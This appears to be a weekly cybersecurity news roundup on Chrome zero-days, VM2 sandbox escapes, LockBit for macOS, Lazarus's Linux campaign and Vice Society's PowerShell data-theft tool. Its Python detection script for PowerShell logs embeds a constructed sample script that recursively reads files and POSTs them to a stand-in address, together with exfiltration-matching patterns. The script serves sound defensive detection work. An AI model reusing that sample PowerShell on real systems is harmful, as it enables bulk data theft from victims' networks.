Date: 2023-04-22



Time to Patch | Google Warns of First Two Zero-Day Vulnerabilities of 2023

Google has released emergency patches for two high-severity zero-day vulnerabilities in Chrome, CVE-2023-2136 and CVE-2023-2033. The latter is actively exploited. Google is withholding full details until a majority of Chrome’s 3 billion users have applied the fix.

CVE-2023-2136 is an integer overflow in Skia, the graphics library used by Chrome. A remote attacker who has already compromised the renderer process can use it to escape the sandbox via a crafted HTML page. CVE-2023-2033 is a type confusion vulnerability in Chrome’s V8 JavaScript engine. Flaws of this type let an attacker crash the browser by reading or writing memory out of bounds, and they can also be exploited to execute arbitrary code on vulnerable devices.

The latest version of the browser, v112.0.5615.137/138, contains a total of 8 fixes. The stable release is currently targeting Windows and Mac, with a Linux rollout coming soon.

Data Exfiltration | Vice Society Ransomware Gang Uses New Stealth PowerShell Tool

The notorious ransomware group Vice Society is running a fairly sophisticated PowerShell script to automate data theft from compromised networks. The new tool relies on living-off-the-land binaries and scripts (LOLBAS) and is designed to avoid triggering alerts from the victim’s security software before the attack reaches its encryption phase.

Researchers first saw the tool earlier this year, when Vice Society used a script named w1.ps1, captured in a Script Block logging event, to exfiltrate data from a victim’s network. The script automates the data exfiltration process through multiple functions: it identifies directories of interest and exfiltrates their contents via HTTP POST requests to Vice Society servers.
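
Because the script was recovered from a Script Block logging event, that same log source is where a defender can look for the behaviour described above. The following is an added example, not code from Unit 42, SentinelOne or the w1.ps1 script itself: it triages decoded PowerShell Script Block events (Windows Event ID 4104) for the bulk-exfiltration shape of recursive directory enumeration combined with an outbound HTTP POST. The event dictionary layout, the indicator patterns and the sample script blocks (including the 198.51.100.7 documentation-range address) are all assumptions constructed for this example; real 4104 events carry more fields and may split long scripts across several records, so a production version would reassemble them first.

```python
"""Triage PowerShell Script Block logging events (Event ID 4104) for the
bulk-exfiltration shape: recursive enumeration plus outbound HTTP POST.

Added illustration; indicator patterns and sample events are constructed
for this example and are not the Unit 42 research or the real w1.ps1.
"""
import re

# Constructed sample events: record id, script path and decoded script
# block text. None of these is the actual Vice Society script.
SAMPLE_EVENTS = [
    {   # Benign: recursive walk that only hashes log files, no upload.
        "record_id": 1,
        "path": "C:\\Scripts\\hash-logs.ps1",
        "script_block": (
            "Get-ChildItem -Path 'C:\\Logs' -Recurse -Filter *.log |\n"
            "  ForEach-Object { Get-FileHash $_.FullName }\n"
        ),
    },
    {   # Suspicious: walk every share, read raw bytes, POST them out.
        "record_id": 2,
        "path": "C:\\Windows\\Temp\\w1.ps1",  # constructed stand-in
        "script_block": (
            "$dirs = Get-ChildItem -Path 'D:\\Shares' -Recurse -Directory\n"
            "foreach ($d in $dirs) {\n"
            "  foreach ($f in Get-ChildItem -Path $d.FullName -File) {\n"
            "    $bytes = [System.IO.File]::ReadAllBytes($f.FullName)\n"
            "    Invoke-WebRequest -Uri 'http://198.51.100.7/up' "
            "-Method Post -Body $bytes\n"
            "  }\n"
            "}\n"
        ),
    },
    {   # Benign: a monitoring heartbeat POST with no file enumeration.
        "record_id": 3,
        "path": "C:\\Scripts\\heartbeat.ps1",
        "script_block": (
            "$status = @{ host = $env:COMPUTERNAME }\n"
            "Invoke-RestMethod -Uri 'https://monitoring.internal/api/beat' "
            "-Method Post -Body ($status | ConvertTo-Json)\n"
        ),
    },
]

# Indicator patterns (assumed for this example). Each is evaluated per
# line so a flag on one cmdlet is not matched against a later line.
INDICATORS = {
    # Collection phase: recursive directory walk.
    "enumerate_files": re.compile(r"Get-ChildItem\b[^\n]*-Recurse", re.I),
    # Raw file reads that yield a byte body suitable for upload.
    "read_file_bytes": re.compile(
        r"\[System\.IO\.File\]::ReadAllBytes"
        r"|Get-Content\b[^\n]*(?:-Encoding\s+Byte|-AsByteStream)",
        re.I,
    ),
    # Outbound HTTP POST via built-in cmdlets or .NET WebClient methods.
    "http_post": re.compile(
        r"Invoke-(?:WebRequest|RestMethod)\b[^\n]*-Method\s+Post"
        r"|\.Upload(?:File|Data|String)\(",
        re.I,
    ),
}

URL_RE = re.compile(r"https?://[^\s'\"]+")


def classify(event):
    """Return the indicators present in one event and whether the
    combination matches the exfiltration shape."""
    text = event["script_block"]
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    # Enumeration alone and POST alone are routine admin activity; the
    # pairing of both in one script block is what warrants a look.
    suspicious = "enumerate_files" in hits and "http_post" in hits
    return {
        "record_id": event["record_id"],
        "path": event["path"],
        "indicators": hits,
        "suspicious": suspicious,
        # Destinations are extracted for hunting across proxy/firewall logs.
        "destinations": URL_RE.findall(text),
    }


def triage(events):
    """Return classification results for the events that look suspicious."""
    return [r for r in map(classify, events) if r["suspicious"]]


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"record {hit['record_id']} {hit['path']}: "
              f"{', '.join(hit['indicators'])} -> {hit['destinations']}")
```

The rule deliberately requires two indicators rather than one: on a real estate the hash-logs and heartbeat scripts above are common, and alerting on either cmdlet alone would bury the one record that matters. Script Block logging must be enabled by policy for these events to exist at all, and because attackers can split collection and upload into separate scripts, correlating the extracted destinations against outbound proxy volume is the natural second step.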

Figure: Overview of script functionality (Source: Unit 42)

Threat actors often use stolen corporate and customer data to extort higher ransoms from victims and resell it to other criminals for additional profit. Vice Society’s latest script shows signs of further evolution since it debuted PolyVice, a new file encryption tool, in December 2022.

Critical RCE Flaw | Sandbox escape PoC available in VM2 JavaScript library

Recently, three sandbox escape proof-of-concept (PoC) exploits were released. All of them allow an attacker to execute malicious code on the host running VM2. VM2 is a specialized JavaScript sandbox commonly used by penetration testing frameworks and code editors to run and test untrusted code in isolation. All three flaws carry a critical CVSS score of 9.8.

CVE-2023-29017 describes a case where VM2 does not properly handle host objects passed to Error.prepareStackTrace during unhandled asynchronous errors, which an attacker could use to gain remote code execution. CVE-2023-29199 affects VM2’s source code transformer; when exploited, an attacker can bypass the sandbox protections and gain remote code execution on the host running the sandbox. CVE-2023-30547 is a flaw in which the handleException() function fails to properly sanitize sandboxed exceptions. By circumventing these sandbox restrictions, attackers can execute arbitrary code on the host and launch serious cyberattacks.

The VM2 maintainers strongly recommend that all users and developers of the library upgrade to version 3.9.17, which addresses these flaws.

LockBit Ransomware | New but Incomplete macOS Variant Samples Surface

Researchers this week revealed details of a LockBit ransomware sample compiled for Apple’s macOS arm64 architecture. To date, there have been no reports of LockBit for Mac being used in the wild, and no associated distribution method has been identified.

The sample discovered uses “test” as a hard-coded password for execution, leading to speculation that the threat is in development. Researchers have found that the Mac variant is a direct descendant of the Linux version and reuses much of the same code. Additionally, the Mac variant does not appear to be able to exfiltrate locked data and has not been shown to have a persistence method.

A breakdown of the variants indicates that there is currently no credible threat to Mac endpoints. While the sample is in its infancy, a LockBit spokesperson said that development of a Mac ransomware payload is an active project, raising concerns that a more effective payload targeting Apple Mac devices may not be far away.

Operation Dream Job | Tools Contained in Linux Malware Found Linked to 3CX Supply Chain Attack

The long-running campaign Operation DreamJob, led by the Lazarus group, has been confirmed to target Linux for the first time this week. Using social engineering techniques to target job seekers on various platforms, victims are tricked into downloading malicious files masquerading as files containing job postings.

The lure delivered to the victim’s device is a ZIP archive containing a Linux payload written in Go and disguised as a PDF file; double-clicking it launches the OdicLoader malware, which then deploys a second-stage C++ backdoor called SimplexTea.

Figure: Diagram of a possible compromise chain (Source: WeLiveSecurity)

The use of this backdoor and other shared artifacts has led researchers to link Operation DreamJob to Smooth Operator, the recent supply chain attack against VoIP provider 3CX. The 3CX attack has received significant attention from the cyber defense community over the past four weeks and is the most serious of a rising number of supply chain attacks.

This Linux-based malware attack attributed to Lazarus is evidence that threat actors continue to expand their arsenal and tactics, expanding malware variants to target more systems than ever before.

Sources
1/ https://Google.com/
2/ https://www.sentinelone.com/blog/the-good-the-bad-and-the-ugly-in-cybersecurity-week-16-4/

